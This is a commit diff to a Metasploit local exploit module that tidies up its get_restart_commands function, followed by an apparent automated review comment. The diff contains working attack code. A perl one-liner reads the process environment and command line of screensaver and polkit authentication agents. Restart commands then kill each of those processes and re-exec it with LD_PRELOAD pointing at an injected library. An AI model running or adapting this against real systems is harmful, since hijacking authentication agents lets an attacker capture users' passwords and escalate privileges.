Clean get_restart_commands

bug/bundler_fix
jvazquez-r7 2014-12-24 14:55:18 -06:00
parent 92b3505119
commit 36ac0e6279
1 changed files with 20 additions and 5 deletions


@ -109,29 +109,44 @@ class Metasploit4 < Msf::Exploit::Local
end end
def get_restart_commands def get_restart_commands
text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\'').gsub("\r","") get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
get_cmd_lines << '$/=undef;'
get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
vprint_status(text_output) vprint_status(text_output)
lines = text_output.split("\n") lines = text_output.split("\n")
process_restart_commands = []
restart_commands = []
i=0 i=0
while(i < lines.length-3) while i < lines.length - 3
m = lines[i].match(/^PID:(\d+)/) m = lines[i].match(/^PID:(\d+)/)
if m if m
pid = m[1] pid = m[1]
vprint_status("PID=#{pid}") vprint_status("PID=#{pid}")
print_status("Found process: " + lines[i+1]) print_status("Found process: " + lines[i+1])
exe = lines[i+1].match(/^EXE:(\S+)$/)[1] exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
vprint_status("exe=#{exe}") vprint_status("exe=#{exe}")
cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00") cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
vprint_status("CMDLINE=" + cmdline.join(" XXX ")) vprint_status("CMDLINE=" + cmdline.join(" XXX "))
env = lines[i+3].match(/^environ:(\w+)$/)[1] env = lines[i+3].match(/^environ:(\w+)$/)[1]
restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\''; restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
vprint_status("RESTART: #{restart_command}") vprint_status("RESTART: #{restart_command}")
process_restart_commands.push(restart_command) restart_commands.push(restart_command)
end end
i+=1 i+=1
end end
return process_restart_commands
restart_commands
end end
def c_code(exe_file) def c_code(exe_file)
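Review bot: The record format emitted by the perl one-liner is still undocumented after the split into `get_cmd_lines` pieces, yet the `while i < lines.length - 3` loop depends on exactly four lines per process in the order `PID:`, `EXE:`, `cmdline:`, `environ:`. A comment above the first `get_cmd_lines` assignment would make that coupling visible, for example `# Emits one PID:/EXE:/cmdline:/environ: record per readable process; cmdline and environ are hex-encoded`. The unchanged `lines[i+1].match(/^EXE:(\S+)$/)[1]` and the two similar `cmdline:`/`environ:` lines index the match result without checking it, so a record that does not fit the pattern (presumably an empty readlink result or a path containing a space) raises NoMethodError. Checking each match before indexing it would be a natural follow-up to this cleanup. Separately, `get_cmd_lines <<` mutates a string literal, which would break if the file ever adopted `# frozen_string_literal: true`.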